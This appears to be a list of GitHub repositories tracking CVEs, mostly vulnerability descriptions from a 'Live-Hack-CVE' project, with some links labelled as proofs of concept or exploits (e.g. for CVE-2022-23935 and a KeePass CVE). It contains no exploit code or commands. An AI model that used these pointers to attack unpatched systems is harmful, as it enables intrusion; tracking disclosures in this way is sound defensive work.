**On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.2-11.5.8, DNS query TCP connections that are aborted before receiving a response from a DNS cache may cause TMM to restart. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6612](https://github.com/Live-Hack-CVE/CVE-2019-6612) create time: 2023-02-10T19:49:16Z

**On BIG-IP 13.0.0-13.1.1.4, 12.1.0-12.1.4, 11.6.1-11.6.3.4, and 11.5.2-11.5.8, SNMP may expose sensitive configuration objects over insecure transmission channels. This issue is exposed when a passphrase is used with various profile types and is accessed using SNMPv2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6613](https://github.com/Live-Hack-CVE/CVE-2019-6613) create time: 2023-02-10T19:49:12Z

**Uninitialized data in SQLite in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13751](https://github.com/Live-Hack-CVE/CVE-2019-13751) create time: 2023-02-10T19:49:08Z

**Out of bounds read in SQLite in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13752](https://github.com/Live-Hack-CVE/CVE-2019-13752) create time: 2023-02-10T19:49:03Z

**Out of bounds read in SQLite in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13753](https://github.com/Live-Hack-CVE/CVE-2019-13753) create time: 2023-02-10T19:48:59Z

**Insufficient policy enforcement in extensions in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to disable extensions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13755](https://github.com/Live-Hack-CVE/CVE-2019-13755) create time: 2023-02-10T19:48:55Z

**Incorrect security UI in printing in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to perform domain spoofing via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13756](https://github.com/Live-Hack-CVE/CVE-2019-13756) create time: 2023-02-10T19:48:51Z

**Incorrect security UI in Omnibox in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13757](https://github.com/Live-Hack-CVE/CVE-2019-13757) create time: 2023-02-10T19:48:47Z

**Incorrect security UI in interstitials in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to perform domain spoofing via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13759](https://github.com/Live-Hack-CVE/CVE-2019-13759) create time: 2023-02-10T19:48:43Z

**Acemanager in ALEOS before version 4.16 allows a user with valid credentials to reconfigure the device to expose the ACEManager credentials on the pre-login status page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46650](https://github.com/Live-Hack-CVE/CVE-2022-46650) create time: 2023-02-10T19:49:38Z

**Acemanager in ALEOS before version 4.16 allows a user with valid credentials to manipulate the IP logging operation to execute arbitrary shell commands on the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46649](https://github.com/Live-Hack-CVE/CVE-2022-46649) create time: 2023-02-10T19:49:35Z

**A remote code execution (RCE) vulnerability in Beekeeper Studio v3.2.0 allows attackers to execute arbitrary code via a crafted payload injected into the display fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26174](https://github.com/Live-Hack-CVE/CVE-2022-26174) create time: 2023-02-10T19:49:31Z

**A proof of concept for CVE-2018-1207.** : [un4gi/CVE-2018-1207](https://github.com/un4gi/CVE-2018-1207) create time: 2023-02-10T19:06:50Z

**An issue was discovered in Ricoh (including Savin and Lanier) Windows printer drivers prior to 2020 that allows attackers local privilege escalation. Affected drivers and versions are: PCL6 Driver for Universal Print - Version 4.0 or later PS Driver for Universal Print - Version 4.0 or later PC FAX Generic Driver - All CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19363](https://github.com/Live-Hack-CVE/CVE-2019-19363) create time: 2023-02-10T17:36:13Z

**A flaw in the Linux kernel's implementation of RDMA communications manager listener code allowed an attacker with local access to setup a socket to listen on a high port allowing for a list element to be used after free. Given the ability to execute code, a local attacker could leverage this use-after-free to crash the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4028](https://github.com/Live-Hack-CVE/CVE-2021-4028) create time: 2023-02-10T17:36:43Z

**Local privilege vulnerability in Yandex Browser for Windows prior to 21.9.0.390 allows a local, low privileged, attacker to execute arbitary code with the SYSTEM privileges through manipulating files in directory with insecure permissions during Yandex Browser update process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25263](https://github.com/Live-Hack-CVE/CVE-2021-25263) create time: 2023-02-10T17:36:19Z

**🐍 Python Exploit for CVE-2022-23935** : [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935) create time: 2023-02-10T18:22:44Z

**Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package starting fro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21676](https://github.com/Live-Hack-CVE/CVE-2022-21676) create time: 2023-02-10T17:36:37Z

**crossbeam-utils provides atomics, synchronization primitives, scoped threads, and other utilities for concurrent programming in Rust. crossbeam-utils prior to version 0.8.7 incorrectly assumed that the alignment of `{i,u}64` was always the same as `Atomic{I,U}64`. However, the alignment of `{i,u}64` on a 32-bit target CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23639](https://github.com/Live-Hack-CVE/CVE-2022-23639) create time: 2023-02-10T17:36:34Z

**In Solana rBPF versions 0.2.26 and 0.2.27 are affected by Incorrect Calculation which is caused by improper implementation of sdiv instruction. This can lead to the wrong execution path, resulting in huge loss in specific cases. For example, the result of a sdiv instruction may decide whether to transfer tokens or not. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23066](https://github.com/Live-Hack-CVE/CVE-2022-23066) create time: 2023-02-10T17:36:28Z

**There is a configuration defect in the activation lock of mobile phones.Successful exploitation of this vulnerability may affect application availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29793](https://github.com/Live-Hack-CVE/CVE-2022-29793) create time: 2023-02-10T17:36:22Z

**The user interface of Array Networks AG Series and vxAG through 9.4.0.470 could allow a remote attacker to use the gdb tool to overwrite the backend function call stack after accessing the system with administrator privileges. A successful exploit could leverage this vulnerability in the backend binary file that handle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24613](https://github.com/Live-Hack-CVE/CVE-2023-24613) create time: 2023-02-10T17:37:08Z

**A stored cross-site scripting (XSS) vulnerability in the component php-inventory-management-system/brand.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Brand Name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24234](https://github.com/Live-Hack-CVE/CVE-2023-24234) create time: 2023-02-10T17:37:04Z

**A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/orders.php?o=add of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Client Name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24233](https://github.com/Live-Hack-CVE/CVE-2023-24233) create time: 2023-02-10T17:37:01Z

**A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/product.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24232](https://github.com/Live-Hack-CVE/CVE-2023-24232) create time: 2023-02-10T17:36:57Z

**A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/categories.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Categories Name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24231](https://github.com/Live-Hack-CVE/CVE-2023-24231) create time: 2023-02-10T17:36:54Z

**A stored cross-site scripting (XSS) vulnerability in the component /formwork/panel/dashboard of Formwork v1.12.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page title parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24230](https://github.com/Live-Hack-CVE/CVE-2023-24230) create time: 2023-02-10T17:36:50Z

**There is a vulnerability in 21.328.01.00.00 version of the E5573Cs-322. Remote attackers could exploit this vulnerability to make the network where the E5573Cs-322 is running temporarily unavailable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-7935](https://github.com/Live-Hack-CVE/CVE-2018-7935) create time: 2023-02-10T16:30:51Z

**Dell PowerScale OneFS, versions 8.2.x-9.3.x, contain a heap-based buffer overflow. A local privileged malicious user could potentially exploit this vulnerability, leading to system takeover. This impacts compliance mode clusters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34454](https://github.com/Live-Hack-CVE/CVE-2022-34454) create time: 2023-02-10T16:31:11Z

**PowerPath Management Appliance with versions 3.3, 3.2*, 3.1 & 3.0* contains sensitive information disclosure vulnerability. An Authenticated admin user can able to exploit the issue and view sensitive information stored in the logs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34452](https://github.com/Live-Hack-CVE/CVE-2022-34452) create time: 2023-02-10T16:31:06Z

**Dell PowerScale OneFS, 8.2.x-9.3.x, contains a Improper Certificate Validation. A unauthenticated remote attacker could potentially exploit this vulnerability, leading to a man-in-the-middle capture of administrative credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22549](https://github.com/Live-Hack-CVE/CVE-2022-22549) create time: 2023-02-10T16:31:02Z

**Dell BIOS contains an information exposure vulnerability. An unauthenticated local attacker with physical access to the system and knowledge of the system configuration could potentially exploit this vulnerability to read system information via debug interfaces. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24410](https://github.com/Live-Hack-CVE/CVE-2022-24410) create time: 2023-02-10T16:30:58Z

**A flaw was found in pesign. The pesign package provides a systemd service used to start the pesign daemon. This service unit runs a script to set ACLs for /etc/pki/pesign and /run/pesign directories to grant access privileges to users in the 'pesign' group. However, the script doesn't check for symbolic links. This cou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3560](https://github.com/Live-Hack-CVE/CVE-2022-3560) create time: 2023-02-10T16:30:26Z

**BTCPayServer version 1.7.5 and below is vulnerable for Open Redirection attack.** : [gonzxph/CVE-2023-0748](https://github.com/gonzxph/CVE-2023-0748) create time: 2023-02-10T16:32:48Z

**The ExtractCCDAAttributes Processor in Apache NiFi 1.2.0 through 1.19.1 does not restrict XML External Entity references. Flow configurations that include the ExtractCCDAAttributes Processor are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22832](https://github.com/Live-Hack-CVE/CVE-2023-22832) create time: 2023-02-10T16:31:19Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-25011. Reason: This candidate is a duplicate of CVE-2023-25011. Notes: All CVE users should reference CVE-2023-25011 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22369](https://github.com/Live-Hack-CVE/CVE-2023-22369) create time: 2023-02-10T16:31:15Z

**A vulnerability has been found in SourceCodester Medical Certificate Generator App 1.0 and classified as critical. This vulnerability affects unknown code of the file action.php. The manipulation of the argument lastname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0774](https://github.com/Live-Hack-CVE/CVE-2023-0774) create time: 2023-02-10T16:30:55Z

**An issue was discovered in the femanager extension before 5.5.3, 6.x before 6.3.4, and 7.x before 7.1.0 for TYPO3. Missing access checks in the InvitationController allow an unauthenticated user to set the password of all frontend users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25013](https://github.com/Live-Hack-CVE/CVE-2023-25013) create time: 2023-02-10T16:30:46Z

**An issue was discovered in the femanager extension before 5.5.3, 6.x before 6.3.4, and 7.x before 7.1.0 for TYPO3. Missing access checks in the InvitationController allow an unauthenticated user to delete all frontend users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25014](https://github.com/Live-Hack-CVE/CVE-2023-25014) create time: 2023-02-10T16:30:42Z

**Dell Command | Monitor versions prior to 10.9 contain an arbitrary folder delete vulnerability during uninstallation. A locally authenticated malicious user may potentially exploit this vulnerability leading to arbitrary folder deletion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24573](https://github.com/Live-Hack-CVE/CVE-2023-24573) create time: 2023-02-10T16:30:38Z

**Dell Alienware Command Center versions 5.5.37.0 and prior contain an Improper Input validation vulnerability. A local authenticated malicious user could potentially send malicious input to a named pipe in order to elevate privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24569](https://github.com/Live-Hack-CVE/CVE-2023-24569) create time: 2023-02-10T16:30:34Z

**Dell Command | Update, Dell Update, and Alienware Update versions before 4.6.0 and 4.7.1 contain Insecure Operation on Windows Junction in the installer component. A local malicious user may potentially exploit this vulnerability leading to arbitrary file delete. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23698](https://github.com/Live-Hack-CVE/CVE-2023-23698) create time: 2023-02-10T16:30:30Z

**A command injection vulnerability in the version parameter in the function recvSlaveCloudCheckStatus of TOTOLINK T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24153](https://github.com/Live-Hack-CVE/CVE-2023-24153) create time: 2023-02-10T16:30:22Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24139](https://github.com/Live-Hack-CVE/CVE-2023-24139) create time: 2023-02-10T16:30:17Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the setNetworkDiag function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24140](https://github.com/Live-Hack-CVE/CVE-2023-24140) create time: 2023-02-10T16:30:13Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the setNetworkDiag function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24141](https://github.com/Live-Hack-CVE/CVE-2023-24141) create time: 2023-02-10T16:30:08Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the setNetworkDiag function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24142](https://github.com/Live-Hack-CVE/CVE-2023-24142) create time: 2023-02-10T16:30:04Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the hour parameter in the setRebootScheCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24144](https://github.com/Live-Hack-CVE/CVE-2023-24144) create time: 2023-02-10T16:30:00Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24143](https://github.com/Live-Hack-CVE/CVE-2023-24143) create time: 2023-02-10T16:29:56Z

**no description** : [dhina016/CVE-2022-47986](https://github.com/dhina016/CVE-2022-47986) create time: 2023-02-10T13:16:42Z

**no description** : [PyterSmithDarkGhost/CVE-2023-24055-PoC-KeePass-2.5x-](https://github.com/PyterSmithDarkGhost/CVE-2023-24055-PoC-KeePass-2.5x-) create time: 2023-02-10T12:04:29Z

**no description** : [houquanen/POC_CVE-2018-19518](https://github.com/houquanen/POC_CVE-2018-19518) create time: 2023-02-10T07:47:54Z

**A denial of service vulnerability in the multipart parsing component of Rack fixed in 2.0.9.2, 2.1.4.2, 2.2.4.1 and 3.0.0.1 could allow an attacker tocraft input that can cause RFC2183 multipart boundary parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44572](https://github.com/Live-Hack-CVE/CVE-2022-44572) create time: 2023-02-09T21:52:51Z

**There is a denial of service vulnerability in the Content-Disposition parsingcomponent of Rack fixed in 2.0.9.2, 2.1.4.2, 2.2.4.1, 3.0.0.1. This could allow an attacker to craft an input that can cause Content-Disposition header parsing in Rackto take an unexpected amount of time, possibly resulting in a denial ofservi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44571](https://github.com/Live-Hack-CVE/CVE-2022-44571) create time: 2023-02-09T21:52:48Z

**A denial of service vulnerability in the Range header parsing component of Rack >= 1.5.0. A Carefully crafted input can cause the Range header parsing component in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that deal with Range requests (such as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44570](https://github.com/Live-Hack-CVE/CVE-2022-44570) create time: 2023-02-09T21:52:44Z

**A denial of service vulnerability present in ActiveRecord's PostgreSQL adapter <7.0.4.1 and <6.1.7.1. When a value outside the range for a 64bit signed integer is provided to the PostgreSQL connection adapter, it will treat the target column type as numeric. Comparing integer values against numeric values can result in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44566](https://github.com/Live-Hack-CVE/CVE-2022-44566) create time: 2023-02-09T21:52:40Z

**A use after free vulnerability exists in curl <7.87.0. Curl can be asked to *tunnel* virtually all protocols it supports through an HTTP proxy. HTTP proxies can (and often do) deny such tunnel operations. When getting denied to tunnel the specific protocols SMB or TELNET, curl would use a heap-allocated struct after it CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43552](https://github.com/Live-Hack-CVE/CVE-2022-43552) create time: 2023-02-09T21:52:37Z

**A command injection vulnerability exists in Jitsi before commit 8aa7be58522f4264078d54752aae5483bfd854b2 when launching browsers on Windows which could allow an attacker to insert an arbitrary URL which opens up the opportunity to remote execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43550](https://github.com/Live-Hack-CVE/CVE-2022-43550) create time: 2023-02-09T21:52:33Z

**An issue in Mojoportal v2.7.0.0 and below allows an authenticated attacker to list all css files inside the root path of the webserver via manipulation of the "s" parameter in /DesignTools/ManageSkin.aspx CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24689](https://github.com/Live-Hack-CVE/CVE-2023-24689) create time: 2023-02-09T21:53:40Z

**An issue in Mojoportal v2.7.0.0 allows an unauthenticated attacker to register a new user even if the Allow User Registrations feature is disabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24688](https://github.com/Live-Hack-CVE/CVE-2023-24688) create time: 2023-02-09T21:53:36Z

**Mojoportal v2.7.0.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Company Info Settings component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtCompanyName parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24687](https://github.com/Live-Hack-CVE/CVE-2023-24687) create time: 2023-02-09T21:53:32Z

**Mojoportal v2.7 was discovered to contain an authenticated XML external entity (XXE) injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24323](https://github.com/Live-Hack-CVE/CVE-2023-24323) create time: 2023-02-09T21:53:28Z

**A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24322](https://github.com/Live-Hack-CVE/CVE-2023-24322) create time: 2023-02-09T21:53:25Z

**A vulnerability, found in EdgeRouters Version 2.0.9-hotfix.5 and earlier and UniFi Security Gateways (USG) Version 4.4.56 and earlier with their DHCPv6 prefix delegation set to dhcpv6-stateless or dhcpv6-stateful, allows a malicious actor directly connected to the WAN interface of an affected device to create a remote CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23912](https://github.com/Live-Hack-CVE/CVE-2023-23912) create time: 2023-02-09T21:53:22Z

**A ReDoS based DoS vulnerability in the GlobalID <1.0.1 which could allow an attacker supplying a carefully crafted input can cause the regular expression engine to take an unexpected amount of time. All users running an affected release should either upgrade or use one of the workarounds immediately. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22799](https://github.com/Live-Hack-CVE/CVE-2023-22799) create time: 2023-02-09T21:53:18Z

**Prior to commit 51867e0d15a6d7f80d5b714fd0e9976b9c160bb0, https://github.com/brave/adblock-lists removed redirect interceptors on some websites like Facebook in which the redirect interceptor may have been there for security purposes. This could potentially cause open redirects on these websites. Brave's redirect inter CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22798](https://github.com/Live-Hack-CVE/CVE-2023-22798) create time: 2023-02-09T21:53:14Z

**An open redirect vulnerability is fixed in Rails 7.0.4.1 with the new protection against open redirects from calling redirect_to with untrusted user input. In prior versions the developer was fully responsible for only providing trusted input. However the check introduced could allow an attacker to bypass with a carefu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22797](https://github.com/Live-Hack-CVE/CVE-2023-22797) create time: 2023-02-09T21:53:10Z

**A regular expression based DoS vulnerability in Active Support <6.1.7.1 and <7.0.4.1. A specially crafted string passed to the underscore method can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22796](https://github.com/Live-Hack-CVE/CVE-2023-22796) create time: 2023-02-09T21:53:06Z

**A regular expression based DoS vulnerability in Action Dispatch <6.1.7.1 and <7.0.4.1 related to the If-None-Match header. A specially crafted HTTP If-None-Match header can cause the regular expression engine to enter a state of catastrophic backtracking, when on a version of Ruby below 3.2.0. This can cause the proces CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22795](https://github.com/Live-Hack-CVE/CVE-2023-22795) create time: 2023-02-09T21:53:03Z

**A vulnerability in ActiveRecord <6.0.6.1, v6.1.7.1 and v7.0.4.1 related to the sanitization of comments. If malicious user input is passed to either the `annotate` query method, the `optimizer_hints` query method, or through the QueryLogs interface which automatically adds annotations, it may be sent to the database wi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22794](https://github.com/Live-Hack-CVE/CVE-2023-22794) create time: 2023-02-09T21:52:59Z

**A regular expression based DoS vulnerability in Action Dispatch <6.0.6.1,< 6.1.7.1, and <7.0.4.1. Specially crafted cookies, in combination with a specially crafted X_FORWARDED_HOST header can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22792](https://github.com/Live-Hack-CVE/CVE-2023-22792) create time: 2023-02-09T21:52:55Z

**An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37304](https://github.com/Live-Hack-CVE/CVE-2021-37304) create time: 2023-02-09T19:38:14Z

**An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: api uri:/sys/user/checkOnlyUser?username=admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37306](https://github.com/Live-Hack-CVE/CVE-2021-37306) create time: 2023-02-09T19:38:09Z

**An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37305](https://github.com/Live-Hack-CVE/CVE-2021-37305) create time: 2023-02-09T19:38:05Z

**Cross Site Scripting (XSS) vulnerability in yzmcms 6.1 allows attackers to steal user cookies via image clipping function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36712](https://github.com/Live-Hack-CVE/CVE-2021-36712) create time: 2023-02-09T19:38:02Z

**Cross Site Scripting (XSS) vulnerability in tpcms 3.2 allows remote attackers to run arbitrary code via the cfg_copyright or cfg_tel field in Site Configuration page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36545](https://github.com/Live-Hack-CVE/CVE-2021-36545) create time: 2023-02-09T19:37:58Z

**Cross Site Scripting (XSS) vulnerability in Gurock TestRail before 7.1.2 allows remote authenticated attackers to run arbitrary code via the reference field in milestones or description fields in reports. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36538](https://github.com/Live-Hack-CVE/CVE-2021-36538) create time: 2023-02-09T19:37:55Z

**The phone-PC collaboration module has a logic bypass vulnerability. Successful exploitation of this vulnerability may affect data confidentiality and integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48290](https://github.com/Live-Hack-CVE/CVE-2022-48290) create time: 2023-02-09T19:38:57Z

**The bundle management module lacks authentication and control mechanisms in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48289](https://github.com/Live-Hack-CVE/CVE-2022-48289) create time: 2023-02-09T19:38:53Z

**The bundle management module lacks authentication and control mechanisms in some APIs. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48288](https://github.com/Live-Hack-CVE/CVE-2022-48288) create time: 2023-02-09T19:38:50Z

**The HwContacts module has a logic bypass vulnerability. Successful exploitation of this vulnerability may affect data integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48287](https://github.com/Live-Hack-CVE/CVE-2022-48287) create time: 2023-02-09T19:38:46Z

**The multi-screen collaboration module has a privilege escalation vulnerability. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48286](https://github.com/Live-Hack-CVE/CVE-2022-48286) create time: 2023-02-09T19:38:43Z

**Some Dahua embedded products have a vulnerability of unauthorized modification of the device timestamp. By sending a specially crafted packet to the vulnerable interface, an attacker can modify the device system time. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30564](https://github.com/Live-Hack-CVE/CVE-2022-30564) create time: 2023-02-09T19:38:39Z

**Buffer overflow vulnerability in function json_parse_value in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45491](https://github.com/Live-Hack-CVE/CVE-2022-45491) create time: 2023-02-09T19:38:24Z

**Buffer overflow vulnerability in function json_parse_number in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45492](https://github.com/Live-Hack-CVE/CVE-2022-45492) create time: 2023-02-09T19:38:18Z

**Vert.x-Web is a set of building blocks for building web applications in the java programming language. When running vertx web applications that serve files using `StaticHandler` on Windows Operating Systems and Windows File Systems, if the mount point is a wildcard (`*`) then an attacker can exfiltrate any class path r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24815](https://github.com/Live-Hack-CVE/CVE-2023-24815) create time: 2023-02-09T19:38:33Z

**In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23636](https://github.com/Live-Hack-CVE/CVE-2023-23636) create time: 2023-02-09T19:38:29Z

**A Denial of Service vulnerability was found in Apache Qpid Dispatch Router versions 0.7.0 and 0.8.0. To exploit this vulnerability, a remote user must be able to establish an AMQP connection to the Qpid Dispatch Router and send a specifically crafted AMQP frame which will cause it to segfault and shut down. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-15699](https://github.com/Live-Hack-CVE/CVE-2017-15699) create time: 2023-02-09T17:29:22Z

**The freelist-randomization feature in mm/slab.c in the Linux kernel 4.8.x and 4.9.x before 4.9.5 allows local users to cause a denial of service (duplicate freelist entries and system crash) or possibly have unspecified other impact in opportunistic circumstances by leveraging the selection of a large value for a rando CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-5546](https://github.com/Live-Hack-CVE/CVE-2017-5546) create time: 2023-02-09T17:29:17Z

**During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache C CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12621](https://github.com/Live-Hack-CVE/CVE-2017-12621) create time: 2023-02-09T17:29:13Z

**The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12077](https://github.com/Live-Hack-CVE/CVE-2020-12077) create time: 2023-02-09T17:29:39Z

